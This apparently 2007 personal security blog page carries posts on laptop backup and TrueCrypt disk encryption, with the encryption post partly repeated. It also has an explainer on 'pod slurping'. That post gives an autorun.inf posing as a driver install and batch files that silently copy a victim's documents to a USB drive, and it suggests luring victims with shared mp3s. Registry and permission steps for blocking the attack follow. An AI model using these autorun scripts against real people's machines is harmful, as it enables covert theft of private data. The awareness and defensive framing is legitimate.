In Part 1, we discussed about hard disk encryption for mobile warrior. It is true that hard disk encryption can be used for anyone that is using a computer as security is applicable to any system for a matter of speaking. This is what makes it so interesting.
Part 2 of the Mobile warrior, I would like to highlight the important of BACKUP. Yes, I capped it so that it captures your eyes. With your laptop now lost and the data in it safely out of the thief reach or a more commonly event: Your hard disk CRASHED. What you need to do is get back to business asap.
You will understand the pain of getting back if you had any of the two events happened to you. If not, one of the two will happen somewhere in your very-luck-so-far life.
FreeAgent from Seagate (http://www.seagate.com/) or similar will be handy. Get the biggest hard disk you can afford which allows you to not only backup your laptop but some of those in your home PC and the software that come with it should be FREE.
If you want to be super sure, try burning some of the critical files into DVD. Talking about high availability. Test it by recovering it to your home PC. With backup scheduled and tested, you can have a good peaceful sleep. Enjoy.
Monday, December 31, 2007
Monday, December 24, 2007
Mobile Warrior - Part 1, Disk Encryption
As a mobile warrior, doing active work on our laptop is part of the daily event. The laptop is the closest device to us next to the mobile phone.
We keep almost anything in it, personal and work matter. It is not a common news that important data are lost and there are no proper means of protecting it.
Is the company to blame or should we as the data custodian responsible? While these questions can open up a whole new can of worms for discussion. We can take some simple measures into our own hand to ensure something can be done or at least things are safe during your watch.
Thanks to the new power of Open Source, most of the applications are free and with qualities equal if not better than the paid version. In addition, some are just simple behavior changes and prospective that can be considered that are again: Free.
To start off let consider disk encryption. The simple thing to do is to hide the data from easy access. This can be done by simply use any encryption software that create single or multi-folders that look like partitioned disk which you can mount and dismount accordingly.
A good example of such disk encryption software (Open Source) : http://www.truecrypt.org/
After playing with it, you might get addicted to have everything encrypted down to the last thumb-drive but remember to back up the key files as well as the good strong password that you had created.
If not, you will be having more problems trying to recover it. Have fun.
We keep almost anything in it, personal and work matter. It is not a common news that important data are lost and there are no proper means of protecting it.
Is the company to blame or should we as the data custodian responsible? While these questions can open up a whole new can of worms for discussion. We can take some simple measures into our own hand to ensure something can be done or at least things are safe during your watch.
Thanks to the new power of Open Source, most of the applications are free and with qualities equal if not better than the paid version. In addition, some are just simple behavior changes and prospective that can be considered that are again: Free.
To start off let consider disk encryption. The simple thing to do is to hide the data from easy access. This can be done by simply use any encryption software that create single or multi-folders that look like partitioned disk which you can mount and dismount accordingly.
A good example of such disk encryption software (Open Source) : http://www.truecrypt.org/
After playing with it, you might get addicted to have everything encrypted down to the last thumb-drive but remember to back up the key files as well as the good strong password that you had created.
If not, you will be having more problems trying to recover it. Have fun.
Friday, December 21, 2007
iPod can be "malicious"...
Many of you may know about Pod Slurping. For the benefit of those who don't, Pod Slurping is the act of using a portable data storage device such as iPod to illicitly download confidential data by directly plugging it into a computer where the data is held.We are talking about using a iPod or USB flashdrive, which will automatically copy files and data when it is connected into the USB port of the victim's system. It is the easiest way to "steal" information from a "innocent" victim without their knowledge.
Very often, you will see people sharing mp3 songs and document files by passing their iPod or USB drive. You can easily put a pod slurping script into your USB drive and trick the victim (with some mp3 songs) to plug it into his/her system.
How to pod slurping
1)To perform pod slurping, write a simple autorun setup file as below:
autorun.inf -
>[autorun]
>open begin.bat
>action=Click "OK" to install USB flash drive drivers
>shell\open\command=begin.bat
2)As seen in the autorun file, write a batch file "begin.bat" that minimise and run the actual batch file that will copy all the "targeted" data.
begin.bat -
>@echo off
>@start /min slurp.bat /B
>@exit
3)Another batch file "slurp.bat" will be the actual batch file that will be copying all the data into your USB drive. Write whatever Dos commands you like to "steal" the victims data such as:
> xcopy *.doc
How to protect against pod slurping
There are a few ways to protect against Pod Slurping. You can either (1)disable the USB storage device or (2) disable USB autorun.
1) To disable the use of USB storage device, If a USB storage device is not already installed on the computer, Set Deny permissions to the user or the group on the following files:
> %SystemRoot%\Inf\Usbstor.pnf
> %SystemRoot%\Inf\Usbstor.inf
If a USB Storage Device Is Already Installed on the Computer, set the registry "Start" value in the registry path "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor" to 4.
For the detail steps, refer to Microsoft Technet (http://support.microsoft.com/kb/823732)
2) To disable the USB autorun, set the registry "NoDriveTypeAutoRun" DWORD value in the registry path "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" to ff(255).
For the details, refer to Microsoft MSDN (http://msdn2.microsoft.com/en-us/library/bb776825.aspx)
So the next time after sharing files from an USB storage, make sure nothing "sensitive" are "secretly" copied out from your system.
Updated on 26 February 2009 -
The US Cert released an announcement on 20th Jan 09, stating that "Microsoft Windows does not disable AutoRun properly". In the announcement, they claims that "Disabling AutoRun on Microsoft Windows systems can help prevent the spread of malicious code. However, Microsoft's guidelines for disabling AutoRun are not fully effective, which could be considered a vulnerability." Viruses, such as the Conficker worm, are using AutoRun to spread.
Microsoft released a support knowledgebase, "Article ID: 967715 - How to correct "disable Autorun registry key" enforcement in Windows", on 24 Feb 09 to provide detail steps in disabling AutoRun in Windows. They also released a security advisory, Update for Windows Autorun (KB967940), with a patch to correct the functionality feature of AutoRun.
Subscribe to:
Posts (Atom)
